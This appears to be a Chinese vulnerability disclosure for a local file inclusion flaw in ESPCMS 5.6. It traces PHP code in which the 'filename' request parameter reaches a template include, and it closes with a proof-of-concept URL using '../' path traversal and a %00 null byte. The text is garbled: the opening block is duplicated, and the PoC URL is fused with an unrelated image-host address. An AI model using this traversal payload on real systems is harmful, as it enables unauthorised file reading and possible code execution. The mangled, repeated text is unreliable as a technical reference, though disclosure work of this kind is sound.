### 简要描述: 包含 ### 详细说明: adminsoft/index.php ``` $archive = indexget('archive', 'R'); $archive = empty($archive) ? 'adminuser' : $archive; $action = indexget('action', 'R'); $action = empty($action) ? 'login' : $action; include admin_ROOT . adminfile . "/control/$archive.php";// 包含产生 good nice $control = new important(); $action = 'on' . $action; if (method_exists($control, $action)) { $control->$action(); } else { exit('错误:系统方法错误!'); } ``` ``` 首先看index.php 02///省略无关代码 03$archive = indexget('ac', 'R'); //ac 04$action = indexget('at', 'R'); //at 05///省略无关代码 06if (empty($archive) || empty($action)) { 07 include admin_ROOT . 'interface/public.php'; 08 $mainlist = new mainpage(); 09 if (method_exists($mainlist, 'in_index')) { 10 $mainlist->in_index(); 11 } else { 12 exit('Access error!'); 13 } 14} else { 15 if (in_array($archive, array('article', 'forum', 'search', 'bbssearch', 'forummain', 'messmain', 'special', 'respond', 'public', 'scriptout', 'enquiry', 'enquirymain', 'form',...
### 简要描述: 包含 ### 详细说明: adminsoft/index.php ``` $archive = indexget('archive', 'R'); $archive = empty($archive) ? 'adminuser' : $archive; $action = indexget('action', 'R'); $action = empty($action) ? 'login' : $action; include admin_ROOT . adminfile . "/control/$archive.php";// 包含产生 good nice $control = new important(); $action = 'on' . $action; if (method_exists($control, $action)) { $control->$action(); } else { exit('错误:系统方法错误!'); } ``` ``` 首先看index.php 02///省略无关代码 03$archive = indexget('ac', 'R'); //ac 04$action = indexget('at', 'R'); //at 05///省略无关代码 06if (empty($archive) || empty($action)) { 07 include admin_ROOT . 'interface/public.php'; 08 $mainlist = new mainpage(); 09 if (method_exists($mainlist, 'in_index')) { 10 $mainlist->in_index(); 11 } else { 12 exit('Access error!'); 13 } 14} else { 15 if (in_array($archive, array('article', 'forum', 'search', 'bbssearch', 'forummain', 'messmain', 'special', 'respond', 'public', 'scriptout', 'enquiry', 'enquirymain', 'form', 'formmain', 'ordermain', 'membermain', 'member', 'forum', 'order'))) { //强制,首页包含木有了 16 $action = 'in_' . $action; /in_$ 函数 17 if (!file_exists(admin_ROOT . "interface/$archive.php")) { //跟进 18 exit('Access error!'); 19 } 20 include admin_ROOT . "interface/$archive.php"; 21 $mainlist = new mainpage(); 22 if (method_exists($mainlist, $action)) { 23 $mainlist->$action(); 24 } else { 25 exit('Access error!'); 26 } 27 } else { 28 exit('Access error!'); 29 } 30} 31///省略无关代码 32跟进到interface/enquity文件 33///省略无关代码 34$filename = $this->fun->accept('filename', 'G'); //filename变量 35 $filename = empty($filename) ? 'list' : $filename; 36///省略无关代码 37$output = $this->pagetemplate->fetch($lng . '/lib/' . $filename); ' 38///省略无关代码 39///跟进函数库查看 40 function fetch($tpl_file, $cache_fileID = null, $outHTML = null) { 41 if (!empty($outHTML)) { 42 $out = $this->gettemprequire($outHTML); 43 return $out; 44 } 45 require_once 'ectemplates_parser.php'; 46 47 if ($this->libfile) { 48 $tpl_file = $this->templatesDIR . $tpl_file . '.html'; //html 49 } 50 51 $template_file = $this->tpl_dir . $tpl_file; 52 53 $parsed_file = $this->tpl_c_dir . md5($tpl_file) . '.php'; 54 55 http://127.0.0.1/espcms_utf8_5.6.13.03.14_bhttps://images.seebug.org/upload/index.php?ac=scriptout&at=list&tid=1&filename=../../../../index.txt%00 ``` ### 漏洞证明: http://127.0.0.1/espcms_utf8_5.6.13.03.14_bhttps://images.seebug.org/upload/index.php?ac=scriptout&at=list&tid=1&filename=../../../../index.txt%00
